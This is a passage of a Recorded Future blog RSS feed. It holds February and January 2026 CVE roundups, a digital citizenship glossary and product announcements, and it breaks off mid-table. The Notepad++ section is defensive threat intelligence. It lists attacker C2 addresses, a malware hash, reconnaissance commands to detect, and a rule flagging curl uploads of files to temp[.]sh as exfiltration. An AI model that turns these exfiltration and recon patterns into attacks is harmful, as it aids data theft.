        <p>Recorded Future's complimentary Identity Exposure Assessment pulls directly from the Recorded Future Intelligence Graph to show you the volume, recency, and severity of your organization's credential exposure over the past year — including compromised employee credentials, infostealer-sourced data, and how your exposure has trended over time.</p>
        <p>There's no commitment required. Just a clear picture of where your organization stands.</p>
        <p><a href="https://pages.recordedfutureext.com/IdentityExposureReport_LandingPage.html">Get your complimentary Identity Exposure Assessment →</a></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1546ac0dd95673dede4cdd0ced6a52f34d677471c.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[February 2026 CVE Landscape: 13 Critical Vulnerabilities Mark 43% Drop from January]]></title>
            <link>https://www.recordedfuture.com/blog/february-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/february-2026-cve-landscape</guid>
            <pubDate>Thu, 12 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[February 2026 saw a 43% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 13 vulnerabilities requiring immediate remediation, down from 23 in January 2026.]]></description>
            <content:encoded><![CDATA[
        <p>February 2026 saw a 43% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>13 vulnerabilities</strong> requiring immediate remediation, down from <a href="https://www.recordedfuture.com/blog/january-2026-cve-landscape">23 in January 2026</a>. All 13 carried a ‘Very Critical’ Recorded Future Risk Score.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>Microsoft dominates:</strong> Six of 13 vulnerabilities affected Microsoft products, accounting for 46% of February's findings; all were added to CISA's KEV catalog on the same day</li>
          <li><strong>Supply-chain attack on Notepad++:</strong> Lotus Blossom, a suspected China state-sponsored threat actor, exploited CVE-2025-15556 to hijack Notepad++'s update channel and deliver a Cobalt Strike Beacon and the Chrysalis backdoor</li>
          <li><strong>APT28 exploits MSHTML flaw:</strong> The Russian state-sponsored group leveraged CVE-2026-21513 via malicious Windows Shortcut files for multi-stage payload delivery</li>
          <li><strong>Public exploits available:</strong> Four of 13 vulnerabilities have publicly available proof-of-concept code; an alleged exploit for a fifth is being advertised for sale</li>
        </ul>
        <p><strong>Bottom line:</strong> Despite a 43% drop in volume, February's vulnerabilities include named threat actor exploitation and five RCE-enabling flaws, making prioritized, intelligence-driven remediation as important as ever.</p>
        <h2><strong>Quick Reference: February 2026 Vulnerability Table</strong></h2>
        <p><em>All 13 vulnerabilities below were actively exploited in February 2026.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BD2JXlW/overview">CVE-2025-15556</a></div>
            <div>99</div>
            <div>Notepad++</div>
            <div>CWE-494 (Download of Code Without Integrity Check)</div>
            <div><a href="https://github.com/George0Papasotiriou/CVE-2025-15556-Notepad-WinGUp-Updater-RCE">Yes</a></div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BECGjWe/overview">CVE-2026-1731</a></div>
            <div>99</div>
            <div>BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA)</div>
            <div>CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))</div>
            <div><a href="https://github.com/win3zz/CVE-2026-1731">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEF-/overview">CVE-2026-21510</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-693 (Protection Mechanism Failure)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGB/overview">CVE-2026-21513</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-693 (Protection Mechanism Failure)</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGC/overview">CVE-2026-21514</a></div>
            <div>99</div>
            <div>Microsoft Office</div>
            <div>CWE-807 (Reliance on Untrusted Inputs in a Security Decision)</div>
            <div>No</div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGG/overview">CVE-2026-21519</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-843 (Access of Resource Using Incompatible Type ('Type Confusion'))</div>
            <div>No</div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGJ/overview">CVE-2026-21525</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-476 (NULL Pointer Dereference)</div>
            <div>No</div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGN/overview">CVE-2026-21533</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-269 (Improper Privilege Management)</div>
            <div>*Yes</div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEPyPC6/overview">CVE-2026-20700</a></div>
            <div>99</div>
            <div>Apple iOS, macOS, tvOS, watchOS, and visionOS</div>
            <div>CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)</div>
            <div>No</div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEThw_R/overview">CVE-2026-25108</a></div>
            <div>99</div>
            <div>Soliton Systems K.K. FileZen</div>
            <div>CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))</div>
            <div>No</div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BC48fmD/overview">CVE-2026-2441</a></div>
            <div>99</div>
            <div>Google Chromium</div>
            <div>CWE-416 (Use After Free)</div>
            <div><a href="https://github.com/huseyinstif/CVE-2026-2441-PoC">Yes</a></div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEdM197/overview">CVE-2026-22769</a></div>
            <div>99</div>
            <div>Dell RecoverPoint for Virtual Machines (RP4VMs)</div>
            <div>CWE-798 (Use of Hard-coded Credentials)</div>
            <div>No</div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEzsB0i/overview">CVE-2026-20127</a></div>
            <div>99</div>
            <div>Cisco Catalyst SD-WAN Controller and Manager</div>
            <div>CWE-287 (Improper Authentication)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20127&amp;type=repositories">Yes</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong> List of vulnerabilities that were actively exploited in February based on Recorded Future data. *An alleged exploit for <a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGN/overview">CVE-2026-21533</a> is being advertised for sale across GitHub. Recorded Future Triage was used to browse the website advertising the exploit, which can be <a href="https://tria.ge/260305-bl376shz8w/behavioral1#:~:text=v16-,Replay%20Monitor,-Downloads">viewed here</a> via the Replay Monitor. (Source: Recorded Future)</em></p>
        <h2><strong>Key Trends: February 2026</strong></h2>
        <h3><strong>Vendors Most Affected</strong></h3>
        <ul>
          <li><strong>Microsoft</strong> led with six vulnerabilities across Windows, Windows Server, Office, and Microsoft 365 products</li>
          <li><strong>BeyondTrust</strong> faced a critical OS command injection flaw in Remote Support (RS) versions 25.3.1 and earlier, and Privileged Remote Access (PRA) versions 24.3.4 and earlier</li>
          <li><strong>Cisco</strong> saw active exploitation of an authentication bypass in Catalyst SD-WAN infrastructure</li>
          <li>Additional affected vendors: Notepad++, Apple, Soliton Systems K.K., Google, and Dell</li>
        </ul>
        <h3><strong>Most Common Weakness Types</strong></h3>
        <ul>
          <li><strong>CWE-78</strong> – OS Command Injection (tied for most common)</li>
          <li><strong>CWE-693</strong> – Protection Mechanism Failure (tied for most common)</li>
          <li><strong>CWE-476</strong> – NULL Pointer Dereference</li>
          <li><strong>CWE-843</strong> – Type Confusion</li>
          <li><strong>CWE-807</strong> – Reliance on Untrusted Inputs in a Security Decision</li>
        </ul>
        <h3><strong>Exploitation Activity</strong></h3>
        <p><strong>Vulnerabilities associated with malware campaigns:</strong></p>
        <ul>
          <li><strong>Lotus Blossom</strong> (suspected China state-sponsored) exploited <strong>CVE-2025-15556</strong> to hijack Notepad++ update traffic between June and December 2025. The campaign rotated C2 servers across three attack chains to deliver a Metasploit loader, Cobalt Strike Beacon, and a custom backdoor called Chrysalis.</li>
          <li><strong>APT28</strong> (Russian state-sponsored) exploited <strong>CVE-2026-21513</strong> using malicious Windows Shortcut (.lnk) files with embedded HTML payloads for multi-stage payload delivery, with observed network communication to infrastructure associated with the threat group.</li>
          <li><strong>UNC6201</strong> (suspected China-nexus) exploited <strong>CVE-2026-22769</strong> to compromise Dell RecoverPoint for VMs appliances, deploying the SLAYSTYLE web shell, BRICKSTORM backdoor, and GRIMBOLT, a C#-based backdoor with native AOT compilation to complicate detection.</li>
        </ul>
        <p><strong>Long-running exploitation activity:</strong></p>
        <ul>
          <li><strong>UAT-8616</strong> exploited <strong>CVE-2026-20127</strong>, chaining it with CVE-2022-20775 to achieve root-level access on Cisco Catalyst SD-WAN systems, with <a href="https://blog.talosintelligence.com/uat-8616-sd-wan/">Cisco Talos attributing</a> the activity to a sophisticated threat actor and assessing that the activity dates back to at least 2023.</li>
        </ul>
        <h2><strong>Priority Alert: Active Exploitation</strong></h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2025-15556 | Notepad++</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added February 12, 2026</p>
        <p><strong>Why this matters:</strong> Lotus Blossom exploited this flaw to replace legitimate Notepad++ update packages with malicious installers, deploying Cobalt Strike and the Chrysalis backdoor to targeted users over a six-month period. The vulnerability affects the WinGUp updater used by Notepad++ versions prior to 8.8.9, which fails to cryptographically verify downloaded update metadata and installers.</p>
        <p><strong>Affected versions:</strong> Notepad++ versions prior to 8.8.9 (version 8.9.1 recommended)</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Update to Notepad++ version 8.9.1, released January 26, 2026</li>
          <li>Hunt for the malicious update.exe sample (SHA256: 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566) in your environment</li>
          <li>Monitor for GUP.exe spawning unexpected child processes</li>
          <li>Review network connections for traffic to 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, 45[.]32[.]144[.]255, or 95[.]179[.]213[.]0</li>
          <li>Check for directories named ProShow under %APPDATA% or unexpected files in %APPDATA%\Adobe\Scripts\</li>
          <li>Block or alert on curl.exe uploading files to temp[.]sh</li>
        </ul>
        <p><strong>Known C2 infrastructure:</strong> 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, cdncheck[.]it[.]com, safe-dns[.]it[.]com, 95[.]179[.]213[.]0</p>
        <p><strong>Detection resources:</strong> Insikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration, available to Recorded Future customers.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_155577ae992ec4ffecd3c5a7fa077ece6041dcb4c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="801" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong> Risk Rules History from <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> Card® for CVE-2025-15556 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Digital Citizenship Glossary: Key Terms Every Internet User Should Know]]></title>
            <link>https://www.recordedfuture.com/blog/digital-citizenship-glossary</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/digital-citizenship-glossary</guid>
            <pubDate>Sun, 08 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A glossary of key internet terms every user should know to protect themselves from scams, phishing, malware, and other digital threats.]]></description>
            <content:encoded><![CDATA[
        <p>The internet is basically a giant digital city, and you need to be just as streetwise here as outside your front door. Most people go online every day - scrolling through TikTok, finishing a research paper, or making purchases - but they don't always know the "rules of the road" or the vocabulary that tech experts use to describe our digital lives. Here's a breakdown of essential digital citizenship terms to help you navigate the web and <a href="https://www.recordedfuture.com/platform/mobile-app">mobile apps</a> like a pro:</p>
        <p><strong>Authority</strong> - Authority refers to how trustworthy a source is based on who created it. If information comes from a <a href="https://www.recordedfuture.com/services/analyst-on-demand">qualified expert</a> or a well-known organization, it's more likely to be reliable than something posted by an unknown user.</p>
        <p><strong>Bystander</strong> - A bystander is someone who sees harmful behavior online, like cyberbullying, but chooses not to get involved or take action.</p>
        <p><strong>Cookies</strong> - Cookies are small files that websites store on your device to remember information about you, like login details or browsing habits. They make websites easier to use, but they also allow service providers to track your activity.</p>
        <p><strong>Cyberbullying</strong> - Cyberbullying is when someone uses digital platforms to repeatedly harass, threaten, or embarrass another person. Unlike trolling, it usually targets a specific individual.</p>
        <p><strong>Data Breach</strong> - A data breach happens when private or sensitive information is accessed or stolen without permission, often from companies or large platforms.</p>
        <p><strong>Digital Citizen</strong> - A digital citizen is anyone who uses technology to interact with others online. Being a good digital citizen means using the internet responsibly, respectfully, and safely.</p>
        <p><strong>Digital Footprint</strong> - A digital footprint is the trail of information you leave behind online through posts, searches, and interactions. The more you share, the greater your exposure to privacy issues or misuse of personal information. Also, once something is online, it can be very difficult to remove.</p>
        <p><strong>Digital Identity Theft</strong> - Digital identity theft occurs when someone steals your personal information, like passwords or account details, to pretend to be you or access your accounts.</p>
        <p><strong>Digital Divide</strong> - The digital divide refers to the gap between people who have access to modern technology and the internet and those who do not.</p>
        <p><strong>Encryption</strong> - Encryption is a method of <a href="https://www.recordedfuture.com/services/intelligence-services">protecting data</a> by turning it into a coded format that only authorized users can read. It helps keep sensitive information secure.</p>
        <p><strong>Firewall</strong> - A firewall is a security system that monitors and controls incoming and outgoing network traffic, blocking anything that looks suspicious or harmful.</p>
        <p><strong>Imaginary Audience</strong> - The imaginary audience is the feeling that people are constantly watching and judging you. Social media can make this feeling stronger by showing likes, views, and comments.</p>
        <p><strong>Invisible Audience</strong> - The invisible audience refers to the unknown people who may see your online content, including strangers, future employers, or others outside your immediate circle. It pays to <a href="https://www.recordedfuture.com/resources/maturity-assessment">assess your security blind spots</a> because you may not realize who is viewing your posts.</p>
        <p><strong>Malware</strong> - Malware is any type of harmful software designed to damage devices, steal information, or disrupt normal operations. It is often installed as part of a package or application that otherwise appears innocent.</p>
        <p><strong>Password Hygiene</strong> - Password hygiene refers to the practice of creating strong, unique passwords and keeping them secure instead of reusing the same one across multiple accounts.</p>
        <p><strong>Phishing</strong> - Phishing is a scam where attackers pretend to be a trusted source to trick you into giving away personal information, often through fake emails, texts, or websites.</p>
        <p><strong>Public Wi-Fi Risk</strong> - Public Wi-Fi risk refers to the potential dangers of using unsecured networks, where hackers may be able to intercept your data.</p>
        <p><strong>Reliability</strong> - Reliability refers to whether information is accurate and dependable. Just because something looks professional online doesn't mean it's true.</p>
        <p><strong>Social Comparison</strong> - Social comparison is the act of comparing your life to what you see online. Since people often share only their best moments, it can create unrealistic expectations.</p>
        <p><strong>Targeted Advertising</strong> - Targeted advertising uses your online behavior, location, and personal data to show ads that are specifically tailored to you.</p>
        <p><strong>Trolling</strong> - Trolling is when someone posts deliberately annoying or provocative content online to get attention or start arguments.</p>
        <p><strong>Two-Factor Authentication (2FA)</strong> - Two-factor authentication is a security feature that requires a second form of verification, like a code sent to your phone, in addition to your password.</p>
        <p><strong>Upstander</strong> - An upstander is someone who takes action when they see harmful behavior online, such as supporting the victim or reporting the issue.</p>
        <p><strong>VPN (Virtual Private Network)</strong> - A VPN is a tool that creates a secure, encrypted connection to the internet, helping protect your data and privacy, especially on public networks.</p>
        <h2>Additional Resources to Learn More</h2>
        <ul>
          <li><a href="https://safecomputing.umich.edu/protect-yourself/be-safe-online/digital-citizenship">What is a Digital Citizen?</a></li>
          <li><a href="https://gssr.georgetown.edu/the-forum/topics/technology/the-global-tech-divide-how-the-digital-revolution-is-leaving-some-of-us-in-the-digital-dark-ages/">The Global Tech Divide: How the Digital Revolution is Leaving Some of Us in the Digital Dark Ages</a></li>
          <li><a href="https://www.internetsociety.org/blog/2024/10/understanding-digital-footprints/">What is a Digital Footprint?</a></li>
          <li><a href="https://www.udel.edu/home/it/ask-it/blog/2025/october/identity-theft-what-to-know/">What is Digital Identity Theft?</a></li>
          <li><a href="https://www.forbes.com/sites/ericwood/2025/11/09/studies-suggests-that-social-media-creates-a-real-imaginary-audience/">Research About The "Imaginary Audience"</a></li>
          <li><a href="https://its.wsu.edu/information-security-services/security-spam-phishing-and-malware/">What is Spam, Phishing, and Malware?</a></li>
          <li><a href="https://library.unm.edu/services/instruction/information-digital-literacy/authority-and-value.php">Authority and Value of Information</a></li>
          <li><a href="https://www.amity.edu/gurugram/blog/career-guidance/dealing-with-comparison-in-the-age-of-social-media">Dealing with Social Comparison in the Age of Social Media</a></li>
          <li><a href="https://lawreview.law.ucdavis.edu/archives/58/3/targeted-advertising">What is Targeted Advertising?</a></li>
          <li><a href="https://news.uga.edu/internet-troll/">What Makes a Troll? The Dangers of Online Narcissism</a></li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_170a907460862545463e135e32cfc0749d89fd10b.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Latin America's Cybersecurity Turning Point: From Reactive Defense to Threat Intelligence]]></title>
            <link>https://www.recordedfuture.com/blog/latin-america-cybersecurity-turning-point</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/latin-america-cybersecurity-turning-point</guid>
            <pubDate>Tue, 03 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Latin America's threat landscape is evolving fast — and reactive defense is no longer enough. PIX fraud, ransomware, and targeted attacks are outpacing overstretched security teams. Recorded Future provides LATAM-specific intelligence, automation, and seamless integrations to help your team get ahead of threats before they hit.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Latin America faces a distinct and evolving cyber threat landscape, from PIX payment fraud to ransomware hitting critical infrastructure.</li>
          <li>Most LATAM security teams are still reactive by necessity, and that posture is costing organizations in downtime, data, and trust.</li>
          <li>Recorded Future offers LATAM-specific threat intelligence, automation, and 100+ integrations to help stretched teams get ahead of attacks before they land.</li>
          <li>Meet us at RSA Booth N-6090 to see how intelligence-led security can transform your team's posture, from response to prevention.</li>
          <li>Join our upcoming webinar to learn what proactive intelligence looks like for your region.<br />Understanding the Dark Covenant, Its Evolution, and Impact</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_17ffeff1c5b7cfe37313bfcf34dda6673c3c7026d.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Recorded Future Expands Coverage of Scams and Financial Fraud with Money Mule Intelligence from CYBERA]]></title>
            <link>https://www.recordedfuture.com/blog/recorded-future-money-mule-intelligence-cybera</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/recorded-future-money-mule-intelligence-cybera</guid>
            <pubDate>Thu, 26 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future is expanding its payment fraud prevention capabilities through a partnership with CYBERA, the industry leader in detecting and verifying data on scam-linked bank accounts.]]></description>
            <content:encoded><![CDATA[
        <p>Recorded Future is expanding its payment fraud prevention capabilities through a partnership with <a href="https://www.cybera.io/company/contact">CYBERA</a>, the industry leader in detecting and verifying data on scam-linked bank accounts.</p>
        <p>Available for purchase now via the Recorded Future Platform, Money Mule Intelligence helps fraud teams identify the accounts criminals use to extract and move stolen funds—addressing a critical gap as scams increasingly become banks' most pressing fraud challenge.</p>
        <h2><strong>The Growing Threat of Authorized Push Payment Fraud</strong></h2>
        <p>Authorized Push Payment (APP) fraud is accelerating. In the U.S., APP fraud losses are projected to reach nearly $15B by 2028, up from $8.3B in 2024, according to <a href="https://www.deloitte.com/us/en/insights/industry/financial-services/authorized-push-payment-fraud.html">Deloitte</a>. While traditional card fraud continues to decline, APP fraud is climbing, fueled by AI-generated deepfakes, personalized scam scripts, and instant payment systems like FedNow and Zelle that move money faster than conventional fraud controls can intercept it.</p>
        <p>Mule accounts, or money mules, are part of the critical infrastructure that makes these scams possible. They provide the bridge that converts stolen payments into untraceable cash or cryptocurrency. Without them, most APP fraud would collapse because criminals cannot risk receiving funds directly into their own accounts. By the time victims realize they've been scammed, mule accounts have already moved the money through multiple layers, typically ending in cash withdrawals or crypto conversions.</p>
        <p>Additionally, the sophistication of mule operations is increasing. Criminal organizations now employ "mule herders" who manage hundreds of accounts at once, using AI to simulate normal transaction behavior (grocery purchases, streaming subscriptions, etc.) so accounts don't appear dormant or suspicious. This makes detection through traditional pattern analysis increasingly difficult.</p>
        <p>Regulators are responding by shifting liability to banks, often viewing those allowing mule accounts to operate as part of the criminal infrastructure itself. For example, the UK now requires banks to reimburse scam victims and allows them to delay suspicious payments for investigation, while U.S. regulators are signaling that banks may be held liable for failing to detect mule accounts.</p>
        <p>Detecting mule accounts is fundamentally difficult. They’re designed to blend in with legitimate activity, and traditional fraud controls can struggle to distinguish between a genuine customer payment and a scam transfer until it's too late.</p>
        <h2><strong>CYBERA's Approach to Mule Intelligence</strong></h2>
        <p>The challenge of detecting and disrupting mule account networks is what led CYBERA's founders to build their solution. Coming from legal practice and law enforcement, CYBERA's leadership team worked scam cases where they witnessed how recovery becomes impossible once funds move through the financial system. They realized that money mule networks represent a central vulnerability in the scam economy, one that banks had limited visibility into.</p>
        <p>Today, CYBERA helps banks and payment networks disrupt scams at the point where funds are extracted. CYBERA's AI-powered Scam Engagement System generates intelligence on bank accounts and payment endpoints actively used by scam networks.</p>
        <p>Unlike probabilistic risk scoring, CYBERA verifies each account, providing evidence and contextual metadata to enable proactive prevention across both internal accounts and outbound payments while minimizing false positives.</p>
        <p>CYBERA supports two core use cases:</p>
        <ul>
          <li><strong>On-Us Mule Detection</strong>, which helps identify mule accounts held at your institution that are already linked to confirmed scam activity. This enables early detection and disruption of high-risk accounts, reducing downstream fraud, repeat victimization, and regulatory exposure within a bank’s accountholders.</li>
          <li><strong>Off-Us Screening</strong>, which screens outbound payments to external beneficiary accounts before execution, helping to prevent customers from sending funds to scammer-controlled accounts. This is particularly valuable for high-value transfers, social engineering attacks, and customer-initiated payments where traditional controls are limited.</li>
        </ul>
        <p>Large financial institutions have already prevented multiple six-figure losses by embedding CYBERA’s intelligence into their transaction monitoring workflows. CYBERA has also been accepted as a member of the Mastercard Start Path program, making it the first Recorded Future partner to achieve this distinction and further validating its role in the payments ecosystem.</p>
        <h2><strong>How Money Mule Intelligence Expands Payment Fraud Intelligence</strong></h2>
        <p><a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Payment Fraud Intelligence</a> (PFI) correlates the widest set of disparate, pre-monetization indicators of fraud to help teams act before their customers are impacted. Money Mule Intelligence extends that capability, giving fraud teams the verified intelligence needed to make high-confidence decisions that disrupt scams by flagging accounts that have been confirmed as mule infrastructure through direct investigation. Together, they provide coverage from initial compromise through attempted cash-out, helping fraud teams prevent losses at multiple intervention points.</p>
        <div>
          <div>
            <div>“Securing payments requires more than reacting to fraud — it requires anticipating it. Integrating Money Mule Intelligence strengthens our ability to illuminate the infrastructure behind financial crime, which is fully aligned with our strategy of securing payments with intelligence.”</div>
          </div>
          <div>
            <div>
              <p><strong>Jamie Zajac</strong></p>
              <p>Chief Product Officer at Recorded Future</p>
            </div>
          </div>
        </div>
        <p>As regulators increasingly expect banks to prevent scam-enabled transfers, Money Mule Intelligence provides the verified data needed to comply with emerging reimbursement requirements while reducing the operational burden of post-incident investigation and remediation.</p>
        <p>PFI users who purchase this capability can now act on both sides of the transaction—compromised payment instruments and scam-linked receiving accounts—with evidence-backed intelligence that minimizes false positives and aligns with the industry's shift toward proactive fraud prevention.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1f90928a17759f89a1ada2a65299215200ab27b00.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day]]></title>
            <link>https://www.recordedfuture.com/blog/january-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/january-2026-cve-landscape</guid>
            <pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[January 2026 saw 23 actively exploited CVEs, including APT28’s Microsoft Office zero-day and critical auth bypass flaws impacting enterprise systems.]]></description>
            <content:encoded><![CDATA[
        <p>January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>APT28's Operation Neusploit:</strong> Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants</li>
          <li><strong>Microsoft and SmarterTools lead concerns:</strong> These vendors accounted for 30% of January's vulnerabilities, with multiple critical authentication bypass and RCE flaws</li>
          <li><strong>Public exploits proliferate:</strong> Fourteen of the 23 vulnerabilities reported have public proof-of-concept exploit code available</li>
          <li><strong>Code Injection dominates:</strong> CWE-94 (Code Injection) was the most common weakness type, followed by CWE-288 (Authentication Bypass Using an Alternate Path or Channel) and CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</li>
        </ul>
        <p><strong>Bottom line:</strong> The slight increase masks significant threats. APT28's zero-day exploitation and multiple critical authentication bypass flaws demonstrate that threat actors continue targeting enterprise communication and management platforms for initial access and persistence.</p>
        <h2>Quick Reference Table</h2>
        <p><em>All 23 vulnerabilities below were actively exploited in January 2026.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20029">CVE-2026-20029</a></div>
            <div>99</div>
            <div>Cisco Identity Services Engine Software</div>
            <div>CWE-611 (Improper Restriction of XML External Entity Reference)</div>
            <div>No</div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20805">CVE-2026-20805</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20805&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20931">CVE-2026-20931</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-73 (External Control of File Name or Path)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-23550">CVE-2026-23550</a></div>
            <div>99</div>
            <div>Modular DS Plugin</div>
            <div>CWE-266 (Incorrect Privilege Assignment)</div>
            <div><a href="https://github.com/search?q=CVE-2026-23550&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24061">CVE-2026-24061</a></div>
            <div>99</div>
            <div>GNU InetUtils</div>
            <div>CWE-88 (Argument Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-24061&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20045">CVE-2026-20045</a></div>
            <div>99</div>
            <div>Cisco Unified Communications Manager</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20045&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-23760">CVE-2026-23760</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div><a href="https://github.com/search?q=CVE-2026-23760&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24423">CVE-2026-24423</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
